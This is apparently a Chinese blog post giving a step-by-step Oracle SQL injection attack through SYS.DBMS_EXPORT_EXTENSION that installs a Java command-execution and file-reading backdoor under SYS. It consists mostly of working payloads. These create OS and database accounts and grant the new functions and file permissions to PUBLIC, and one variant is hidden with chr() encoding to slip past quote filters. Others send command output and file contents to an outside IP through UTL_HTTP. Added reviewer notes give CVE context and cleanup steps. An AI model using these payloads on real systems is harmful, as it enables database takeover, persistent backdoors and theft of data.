
实例演示oracle注入获取cmdshell的全过程

发表于 2012-12-18 12:21:48
以下的演示都是在web上的sql plus执行的,在web注入时 把select SYS.DBMS_EXPORT_EXTENSION.....改成
/xxx.jsp?id=1 and '1'<>'a'||(select SYS.DBMS_EXPORT_EXTENSION.....)
的形式即可。(用" 'a'|| "是为了让语句返回true值:拼上'a'之后结果必然不等于'1',即使子查询返回NULL,Oracle里 'a'||NULL 也还是'a'。)
语句有点长,可能要用post提交。
审阅说明:下面所有步骤都依赖 SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES 的 PL/SQL 注入缺陷(公开资料记为 CVE-2006-0265,Oracle 已在 2006 年的 Critical Patch Update 中修补)。之所以能以 SYS 身份执行任意 DDL,是因为这个包归 SYS 所有、以定义者权限运行,而且默认把 EXECUTE 授给了 PUBLIC。已打补丁的实例上这些语句只会报错;第1步还要求目标库装有 Oracle JVM。本文所有操作仅适用于已取得书面授权的渗透测试,并且测试结束后必须把创建的对象、账号和授权全部清理掉。
以下是各个步骤:
1.创建包
通过注入 SYS.DBMS_EXPORT_EXTENSION 函数,在oracle上创建Java包LinxUtil,里面两个函数,runCMD用于执行系统命令,readFile用于读取文件:
/xxx.jsp?id=1 and '1'<>'a'||(
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
create or replace and compile java source named "LinxUtil" as import java.io.*; public class LinxUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader(
new InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}public static String readFile(String filename){try{BufferedReader myReader= new BufferedReader(new FileReader(filename)); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}
}'''';END;'';END;--','SYS',0,'1',0) from dual
)
说明:这段 DDL 是以 SYS 身份执行的(参数里的 'SYS'),所以 "LinxUtil" 会建在 SYS 模式下,是一个持久化的后门。runCMD 只读取子进程的标准输出(getInputStream),标准错误不会返回;Runtime.exec(String) 按空白切分参数且不识别引号,管道、重定向之类的 shell 语法必须经 cmd /c 或 /bin/sh -c 包装。命令以 Oracle 数据库进程所属的操作系统账号身份运行。
------------------------
如果url有长度限制,可以把readFile()函数块去掉,即:
/xxx.jsp?id=1 and '1'<>'a'||(
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
create or replace and compile java source named "LinxUtil" as import java.io.*; public class LinxUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader(
new InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}
}'''';END;'';END;--','SYS',0,'1',0) from dual
)
同时把后面步骤 提到的 对readFile()的处理语句去掉。
------------------------------
2.赋Java权限
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''begin dbms_java.grant_permission( ''''''''PUBLIC'''''''', ''''''''SYS:java.io.FilePermission'''''''', ''''''''<<ALL FILES>>'''''''', ''''''''execute'''''''' );end;'''';END;'';END;--','SYS',0,'1',0) from dual
说明:这一步把 java.io.FilePermission <<ALL FILES>> 的 execute 授给了 PUBLIC,也就是库里每一个账号的 Java 代码都获得了执行任意文件的权限,而不只是 LinxUtil。readFile 用到的是 read 权限,这里并没有授予;如果它报 java.security.AccessControlException,需要用同样方式再授一次 read。授权对象应收窄到真正需要的那个用户而不是 PUBLIC,清理时用 dbms_java.revoke_permission 以同样的四个参数撤销。
3.创建函数
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
create or replace function LinxRunCMD(p_cmd in varchar2)  return varchar2  as language java name ''''''''LinxUtil.runCMD(java.lang.String) return String'''''''';   '''';END;'';END;--','SYS',0,'1',0) from dual
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
create or replace function LinxReadFile(filename in varchar2)  return varchar2  as language java name ''''''''LinxUtil.readFile(java.lang.String) return String'''''''';   '''';END;'';END;--','SYS',0,'1',0) from dual
说明:两个包装函数同样建在 SYS 模式下,没有写 authid,默认是定义者权限,所以调用者是以 SYS 的身份跑 Java 的。返回类型是 varchar2,命令输出或文件内容很长时可能超出 varchar2 的长度限制而报错,必要时先截断或分段读取。
4.赋public执行函数的权限
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''grant all on LinxRunCMD to public'''';END;'';END;--','SYS',0,'1',0) from dual
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''grant all on LinxReadFile to public'''';END;'';END;--','SYS',0,'1',0) from dual
说明:grant all ... to public 之后,任何能建立会话的数据库账号都可以借 SYS 的身份执行操作系统命令、读任意文件。函数实际只需要 EXECUTE 权限,而且应只授给注入点所用的那个账号;对 PUBLIC 的授权会留在 dba_tab_privs 里,很容易被审计发现。
5.测试上面的几步是否成功
and '1'<>'11'||(
select  OBJECT_ID from all_objects where  object_name ='LINXRUNCMD'
)
and '1'<>(
select  OBJECT_ID from all_objects where  object_name ='LINXREADFILE'
)
说明:第一种写法其实判断不出结果——对象不存在时子查询返回 NULL,'11'||NULL 等于 '11','1'<>'11' 仍然为真;对象存在时 '11'||OBJECT_ID 也不等于 '1',两种情况页面表现一样。第二种写法对象不存在时条件为 UNKNOWN,页面走假分支,才能区分。更直接的检查是 and (select count(*) from all_objects where object_name='LINXRUNCMD')=1。函数名创建时没加引号,所以存的是大写。
6.执行命令:
/xxx.jsp?id=1 and '1'<>(
select  sys.LinxRunCMD('cmd /c net user linx /add') from dual
)
/xxx.jsp?id=1 and '1'<>(
select  sys.LinxReadFile('c:/boot.ini') from dual
)
说明:示例是 Windows 下的命令。Linux 上要经 /bin/sh -c 调用,但 Runtime.exec(String) 只按空白切分、不处理引号,带空格的命令行会被拆坏,要么把 runCMD 改成接收 String[],要么把命令写进脚本文件再执行。net user linx /add 会在目标机上留下一个新系统账号,属于持久化改动;授权测试中应改用 whoami、ipconfig 这类无副作用的命令并记录在案。
注意sys.LinxReadFile()返回的是varchar类型,不能用"and 1<>" 代替 "and '1'<>"。(否则 Oracle 会把返回的字符串隐式转换成数字,内容不是数字时直接报 ORA-01722 invalid number,页面只能看到报错,看不到真假差异。)
如果要查看运行结果可以用 union :
/xxx.jsp?id=1 union select  sys.LinxRunCMD('cmd /c net user linx /add') from dual
或者UTL_HTTP.request():
/xxx.jsp?id=1 and '1'<>(
SELECT UTL_HTTP.request('http://211.71.147.3/record.php?a=LinxRunCMD:'||REPLACE(REPLACE(sys.LinxRunCMD('cmd /c net user aaa /del'),' ','%20'),'\n','%0A')) FROM dual
)
/xxx.jsp?id=1 and '1'<>(
SELECT UTL_HTTP.request('http://211.71.147.3/record.php?a=LinxRunCMD:'||REPLACE(REPLACE(sys.LinxReadFile('c:/boot.ini'),' ','%20'),'\n','%0A')) FROM dual
)
注意:用UTL_HTTP.request时,要用 REPLACE() 把空格、换行符给替换掉,否则会无法提交http request。用utl_encode.base64_encode也可以。
审阅说明:上面的 REPLACE(...,'\n','%0A') 实际不起作用——Oracle 的字符串字面量没有转义序列,'\n' 就是反斜杠和 n 两个字符,而 runCMD/readFile 拼进去的是真正的换行符,应写成 REPLACE(...,chr(10),'%0A')(Windows 下的输出可能还带 chr(13))。只替换空格和换行也不够,输出里的 &、#、% 等同样会破坏 URL,更稳妥的是整体编码:utl_raw.cast_to_varchar2(utl_encode.base64_encode(utl_raw.cast_to_raw(...)))(base64 结果本身可能含 +、/ 和换行,仍需处理),或在 10g 以上用 UTL_URL.ESCAPE。union 方式要求列数和类型与原查询匹配。211.71.147.3 是作者自己的接收端,复现时要换成自己控制的主机;11g 起数据库对外发 HTTP 还受网络 ACL(DBMS_NETWORK_ACL_ADMIN)限制,可能被拒绝。
--------------------
7.内部变化
通过以下命令可以查看all_objects表的改变:
select  * from all_objects where  object_name like '%LINX%' or  object_name like '%Linx%'
(函数是不带引号创建的,存成大写 LINXRUNCMD/LINXREADFILE;Java 源 "LinxUtil" 是带引号创建的,大小写敏感,所以要两个 like。这些对象、dba_java_policy 里的 Java 授权记录和 dba_tab_privs 里对 PUBLIC 的授权,都是取证时非常明显的痕迹。)
8.删除我们创建的函数
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
drop function LinxRunCMD  '''';END;'';END;--','SYS',0,'1',0) from dual
审阅说明:只 drop LinxRunCMD 清理并不完整。还要用同样的注入方式执行 drop function LinxReadFile 和 drop java source "LinxUtil",并用 dbms_java.revoke_permission('PUBLIC','SYS:java.io.FilePermission','<<ALL FILES>>','execute') 撤销第2步给 PUBLIC 的 Java 权限;否则 SYS 模式下仍然留着一个任何账号都能调用的命令执行/读文件后门。(对象被 drop 后,对它的 grant 会随之消失,不必单独 revoke。)
====================================================
全文结束。谨以此文赠与我的朋友。
linx
124829445
2008.1.12
linyujian@bjfu.edu.cn
======================================================================
测试漏洞的另一方法:
创建oracle帐号:
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
CREATE USER linxsql IDENTIFIED BY linxsql'''';END;'';END;--','SYS',0,'1',0) from dual
(说明:账号名和口令都是 linxsql,弱口令本身就是一个新风险;而且创建账号会出现在 dba_users 和审计日志里,比只做 select 的验证方式显眼得多,测试完务必按后面的步骤删除。)
即(把三个参数整体用 chr() 拼接,用于绕过对引号的过滤;注意这个版本写的是 PUT(:P1),前面各步写的是 PUT(1),两种写法在原帖中都出现过):
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES(chr(70)||chr(79)||chr(79),chr(66)||chr(65)||chr(82),
chr(68)||chr(66)||chr(77)||chr(83)||chr(95)||chr(79)||chr(85)||chr(84)||chr(80)||chr(85)||chr(84)||chr(34)||chr(46)||chr(80)||chr(85)||chr(84)||chr(40)||chr(58)||chr(80)||chr(49)||chr(41)||chr(59)||chr(69)||chr(88)||chr(69)||chr(67)||chr(85)||chr(84)||chr(69)||chr(32)||chr(73)||chr(77)||chr(77)||chr(69)||chr(68)||chr(73)||chr(65)||chr(84)||chr(69)||chr(32)||chr(39)||chr(68)||chr(69)||chr(67)||chr(76)||chr(65)||chr(82)||chr(69)||chr(32)||chr(80)||chr(82)||chr(65)||chr(71)||chr(77)||chr(65)||chr(32)||chr(65)||chr(85)||chr(84)||chr(79)||chr(78)||chr(79)||chr(77)||chr(79)||chr(85)||chr(83)||chr(95)||chr(84)||chr(82)||chr(65)||chr(78)||chr(83)||chr(65)||chr(67)||chr(84)||chr(73)||chr(79)||chr(78)||chr(59)||chr(66)||chr(69)||chr(71)||chr(73)||chr(78)||chr(32)||chr(69)||chr(88)||chr(69)||chr(67)||chr(85)||chr(84)||chr(69)||chr(32)||chr(73)||chr(77)||chr(77)||chr(69)||chr(68)||chr(73)||chr(65)||chr(84)||chr(69)||chr(32)||chr(39)||chr(39)||chr(67)||chr(82)||chr(69)||chr(65)||chr(84)||chr(69)||chr(32)||chr(85)||chr(83)||chr(69)||chr(82)||chr(32)||chr(108)||chr(105)||chr(110)||chr(120)||chr(115)||chr(113)||chr(108)||chr(32)||chr(73)||chr(68)||chr(69)||chr(78)||chr(84)||chr(73)||chr(70)||chr(73)||chr(69)||chr(68)||chr(32)||chr(66)||chr(89)||chr(32)||chr(108)||chr(105)||chr(110)||chr(120)||chr(115)||chr(113)||chr(108)||chr(39)||chr(39)||chr(59)||chr(69)||chr(78)||chr(68)||chr(59)||chr(39)||chr(59)||chr(69)||chr(78)||chr(68)||chr(59)||chr(45)||chr(45),chr(83)||chr(89)||chr(83),0,chr(49),0) from dual
确定漏洞存在:
1<>(
select user_id from all_users where username='LINXSQL'
)
(user_id 是数字列,这里可以直接用 1<>;账号不存在时子查询返回 NULL,条件为 UNKNOWN,页面走假分支。)
给linxsql连接权限:
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
GRANT CONNECT TO linxsql'''';END;'';END;--','SYS',0,'1',0) from dual
删除帐号:
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
drop user LINXSQL'''';END;'';END;--','SYS',0,'1',0) from dual
======================
以下方法创建一个可以执行多语句的函数Linx_query(),执行成功的话返回数值"1",但权限是继承的,可能仅仅是public权限,作用似乎不大,真的要用到话可以考虑grant dba to 当前的User:
(审阅说明:"权限是继承的"是因为函数声明了 authid current_user,即调用者权限——execute immediate 以调用它的账号(一般就是 web 应用连库用的账号)的权限运行,而不是创建者 SYS。另外函数里没有 PRAGMA AUTONOMOUS_TRANSACTION,从 select ... from dual 里调用它去执行 DML/DDL 会报 ORA-14551,需要像上面的注入载荷那样在声明部分加上这个 pragma。grant dba to <当前用户> 会永久提升应用账号的权限,影响面大、也极易被发现,授权测试中必须记录并在结束时 revoke。)
1.jsp?id=1 and '1'<>(
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
create or replace function Linx_query (p varchar2) return number authid current_user is begin execute immediate p; return 1;  end;   '''';END;'';END;--','SYS',0,'1',0) from dual
)
[原帖到此截断,下面只剩一个残缺的重复片段:]
1.jsp?id=1 and '1'<>( select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ...
)